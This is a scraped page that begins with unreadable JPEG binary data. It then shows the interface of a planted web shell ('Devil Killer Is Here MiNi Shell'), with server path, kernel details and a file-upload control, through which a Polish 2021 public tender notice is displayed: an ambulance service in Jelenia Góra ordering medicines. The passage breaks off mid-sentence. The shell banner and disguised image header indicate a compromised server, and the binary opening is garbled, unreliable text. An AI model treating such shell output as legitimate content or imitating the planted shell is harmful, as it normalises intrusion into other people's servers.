JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210716/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210716/0011764501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00117645 z dnia 2021-07-16</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> dostawa leków stosowanych w OZW </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Pogotowie Ratunkowe w Jeleniej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001082454</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Cieplicka 126a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-570</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">757554731</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">757526462</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@999.jgora.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.999.jgora.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Samodzielny Publiczny Zakład opieki zdrowotnej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> dostawa leków stosowanych w OZW </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ff22440e-e606-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00117645</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00020953/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Leki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://jgora.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W niniejszym postępowaniu<br/>komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji<br/>elektronicznej. Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia,<br/>wnioski, zawiadomienia oraz informacje przekazywane są w formie elektronicznej za pośrednictwem<br/>Platformy https://jgora.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem<br/>platformy przetargowej. Informacje dotyczące odpowiedzi na pytania, zmiany SWZ, zmiany terminu<br/>składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie przetargowej.<br/>Korespondencja , której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca,<br/>będzie przekazywana w formie elektronicznej za pośrednictwem platformy przetargowej do<br/>konkretnego wykonawcy.- wymagania techniczne związane z korzystaniem z platformy przetargowej<br/>znajdują się na stronie: https://jgora.logintrade.net/rejestracja/instrukcje.html- Wykonawca zobowiązany<br/>jest zapoznać się z instrukcjami dla użytkowników platformy przetargowej dostępnymi pod adresem:<br/>https://jgora.logintrade.net/rejestracja/instrukcje.html- wsparcia technicznego w zakresie działania<br/>platformy przetargowej udziela jej dostawa LOGINTRADE S.A nr.tel. 71 787 35 34 e-mail:<br/>helpdesk@logintrade.net od poniedziałku do piątku (dni robocze) w godz: 8:00 – 16:003. Korzystanie z<br/>Platformy jest bezpłatne. 4. Wszelką korespondencję związaną z niniejszym postępowaniem należy<br/>przekazywać za pośrednictwem Platformy. Korespondencję uważa się za przekazaną w terminie, jeżeli<br/>dotrze do zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej<br/>niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L119 z04.05.2016, str. 1), dalej „RODO”, informuję, że:1. Administratorem Pani/Pana danych<br/>osobowych jest:• Zamawiający – [Pogotowie Ratunkowe w Jeleniej Grze, ul. Cieplicka 126A , 58-570<br/>Jelenia Góra,względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał, w<br/>szczególności:wykonawcy będącego osobą fizyczną, pełnomocnika wykonawcy członka organu<br/>zarządzającego wykonawcy, osób skierowanych do przygotowania i przeprowadzenia postępowania o<br/>udzielenie zamówienia publicznego lub konkursu.2. Współadministratorem Pani/Pana danych<br/>osobowych jest:• Urząd Zamówień Publicznych [ul. Postępu 17a, 02-676 Warszawa, reprezentowany<br/>przez Prezesa UZP] – względem osób fizycznych, od których dane osobowe pozyskał w toku kontroli•<br/>Krajowa Izba Odwoławcza ul. Postępu 17a, 02-676 Warszawa, reprezentowana przez Prezesa KIO] –<br/>względem osób fizycznych, od których pozyskał dane osobowe w ramach wniesionych<br/>środków ochrony prawnej.3. W Pogotowiu Ratunkowym w Jeleniej Górze wyznaczony W Pogotowiu Ratunkowym w Jeleniej Górze wyznaczony został Inspektor Danych Osobowych, e-mail:<br/>ido@999.jgora.pl tel. 75 75 231 01wew. 125Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b, c, e RODO w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego (ZP-7/2021 na dostawę leków stosowanych w OZW) prowadzonym w trybie podstawowym bez negocjacji na podstawie art. 275 ust 1 Pzp oraz wykonania umowy – w kategorii dane zwykłe/dane wrażliwe, o<br/>których mowa w art. 9 i/lub art. 10 RODO.4. Dane osobowe będą przetwarzane jedynie w celu i<br/>zakresie niezbędnym do wypełnienia obowiązków prawnych ciążących na administratorze,<br/>polegających na:1) przeprowadzeniu niniejszego postępowania o udzielenie Zamówienia;2) wyłonieniu<br/>wykonawcy oraz udzielenia Zamówienia poprzez zawarcie Umowy;3) realizacji zawartej Umowy;4)<br/>przechowywaniu dokumentacji niniejszego postępowania o udzielenie Zamówienia na wypadek kontroli<br/>prowadzonej przez uprawnione organy i podmioty;5) przekazaniu dokumentacji niniejszego<br/>postępowania o udzielenie Zamówienia do archiwum, a następnie jej zbrakowanie (trwałe usunięcie i<br/>zniszczenie)− w kategorii dane zwykłe – imię, nazwisko, zajmowane stanowisko i miejsce pracy, numer<br/>służbowego telefonu i/ lub faksu, służbowy adres email, a także dane identyfikujące wykonawcę<br/>biorącego udział wprowadzonym niniejszym postępowaniu o udzielenie Zamówienia, tj. nazwę<br/>wykonawcy, siedzibę i adres wykonawcy, REGON, NIP, PESEL, adres zamieszkania, adres strony<br/>internetowej, dane dotyczące doświadczenia i kwalifikacji osób wskazanych przez wykonawcę w<br/>ofercie, dane ekonomiczno-finansowe;− w kategorii dane wrażliwe – w szczególności dane dotyczące<br/>skazań, wynikających z dokumentów z Krajowego Rejestru Karnego– jeżeli dane te zostały przez<br/>wykonawcę podane w niniejszym postępowaniu o udzielenie Zamówienia.5. Do przetwarzania danych<br/>osobowych w kategorii dane wrażliwe dotyczące wyroków skazujących, o których mowa w art. 10<br/>RODO, dopuszczone są wyłącznie osoby posiadające pisemne upoważnienie.Osoby takie są ponadto<br/>zobowiązane do zachowania tych danych w poufności.6. Zasada jawności ma zastosowanie do<br/>wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 RODO.7. Zamawiający<br/>przetwarza dane osobowe zebrane w postępowaniu o udzielenie zamówienia publicznego w sposób<br/>gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.Pełna treść klauzuli<br/>znajduje się w załączniku nr 6 do SWZ ZP 7/2021</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-7/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa leków stosownych w OZW Szczegółowy opis przedmiotu<br/>zamówienia znajduje się w załączniku nr 2 do SWZ ZP 7 / 2021 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska największą ilość<br/>punktów w ramach określonych kryteriów oceny ofert. Przy dokonywaniu wyboru oferty<br/>Zamawiający stosował będzie wyłącznie kryteria określone w niniejszej SWZ.2. W celu<br/>wyłonienia najkorzystniejszej oferty w świetle kryterium ceny, Zamawiający do porównania ofert<br/>będzie brał pod uwagę cenę brutto.3. Punktacja przyznawana ofertom w kryteriach będzie<br/>liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy<br/>najkorzystniejszą ofertę.4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta<br/>odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie PZP, oraz w SWZ i<br/>zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.5. Zamawiający nie przewiduje przeprowadzenia dogrywki w formie aukcji elektronicznej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp zamawiający określa warunki udziału w postępowaniu<br/>dotyczący:1) zdolności do występowania w obrocie gospodarczym; Zamawiający nie określa<br/>warunku w tym zakresie. Wystarczające będzie złożenie przez Wykonawcę oświadczenia o<br/>spełnianiu tego warunku.2) uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, jeśli wynika to z odrębnych przepisów; Zamawiający uzna warunek za spełniony,<br/>jeżeli wykonawca załączy do oferty koncesję na prowadzenie hurtowni farmaceutycznej. 3)<br/>sytuacji ekonomicznej lub finansowej; Zamawiający nie określa warunku w tym zakresie.<br/>Wystarczające będzie złożenie przez Wykonawcę oświadczenia o spełnianiu tego warunku.4)<br/>zdolności technicznej lub zawodowej. Zamawiający nie określa warunku w tym zakresie.<br/>Wystarczające będzie złożenie przez Wykonawcę oświadczenia o spełnianiu tego warunku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">koncesja na prowadzenie hurtowni farmaceutycznej</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) oświadczenia wykonawcy, w zakresie art.108 ust.1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz.U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowe – wg wzoru na załączniku<br/>nr 4 do SWZ.;b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej, w zakresie art.109 ust.1 pkt 4 ustawy, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji,c) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art.125 ust.1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>zamawiającego, wg wzoru na załączniku nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda, by wykonawca złożył wraz z ofertą następujące przedmiotowe środki dowodowe: a) Oświadczenie, że leki znajdują się w Rejestrze Produktów Leczniczych dopuszczonych do obrotu na terenie Rzeczypospolitej Polskiej.b) Oświadczenie wykonawcy, że leki będące przedmiotem zamówienia będą miały termin ważności nie krótszy niż 1 rok od momentu złożenia zamówienia.c) W przypadku zaoferowania przez wykonawcę produktu biorównoważnego niezbędne jest załączenie przez wykonawcę Charakterystyki Produktu Leczniczego.2. Zamawiający akceptuje równoważne przedmiotowe środki dowodowe, jeśli potwierdzają, że oferowane świadczenia spełniają określone przez zamawiającego wymagania, cechy lub kryteria. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a) Oświadczenie, że leki znajdują się w Rejestrze Produktów Leczniczych dopuszczonych do<br/>obrotu na terenie Rzeczypospolitej Polskiej.b) Oświadczenie wykonawcy, że leki będące<br/>przedmiotem zamówienia będą miały termin ważności nie krótszy niż 1 rok od momentu złożenia<br/>zamówienia. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wypełniony formularz ofertowy, zgodnie z Załącznikiem nr 1 do SWZ2) Wypełniony formularz<br/>cenowy/przedmiot zamówienia zgodnie z Załącznikiem nr 2 do SWZ3) Wykonawca dołącza do<br/>oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu w zakresie wskazanym w rozdziale VIII i IX SWZ – zgodnie z załącznikiem nr 3 do<br/>SWZOświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący<br/>wymagane podmiotowe środki dowodowe, wskazane w rozdziale XVI pkt.8 SWZ.- oświadczenie<br/>składane jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym, lub podpisem osobistym.a) Oświadczenie składają odrębnie:-<br/>wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W<br/>takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu;- podmiot trzeci, na którego potencjał<br/>powołuje się wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W<br/>takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby<br/>wykonawcy; podwykonawcy, na których zasobach wykonawca nie polega przy wykazywaniu<br/>spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza<br/>brak podstaw wykluczenia podwykonawcy (jeżeli zamawiający weryfikuje podstawy wykluczenia<br/>w odniesieniu do podwykonawcy)5) Do oferty wykonawca załącza również: (wybrać<br/>odpowiednie)a) Pełnomocnictwo b) Oświadczenie wykonawców wspólnie ubiegających się o<br/>udzielenie zamówieniac) Przedmiotowe środki dowodowe wskazane w rozdziale VI.Wymagana<br/>forma:d) Zobowiązanie podmiotu trzeciego- Zobowiązanie podmiotu udostępniającego zasoby<br/>lub inny podmiotowy środek dowodowy potwierdza, że stosunek łączący wykonawcę z<br/>podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz<br/>określa w szczególności:- zakres dostępnych wykonawcy zasobów podmiotu udostępniającego<br/>zasoby;- sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów<br/>podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;- czy i w jakim zakresie<br/>podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.e)<br/>Wykaz rozwiązań równoważnych – wykonawca, który powołuje się na rozwiązania równoważne,<br/>jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone<br/>przez zamawiającego. W takim przypadku wykonawca załącza do oferty wykaz rozwiązań<br/>równoważnych z jego opisem lub normami.f) Zastrzeżenie tajemnicy przedsiębiorstwa – w<br/>sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę<br/>przedsiębiorstwa, wykonawca, wraz z przekazaniem takich informacji, zastrzega, że nie mogą<br/>być one udostępniane, oraz wykazuje, że zastrzeżone informacje stanowią tajemnicę<br/>przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej<br/>konkurencji.g) Informacje dotyczące wykonawcy (załącznik nr 7 do SWZ) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia.W takim przypadku:a)<br/>Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika<br/>doreprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i<br/>zawarciaumowy w sprawie przedmiotowego zamówienia publicznego.b) Wszelka<br/>korespondencja prowadzona będzie przez zamawiającego wyłącznie z pełnomocnikiem.-<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko<br/>jedenspełnia 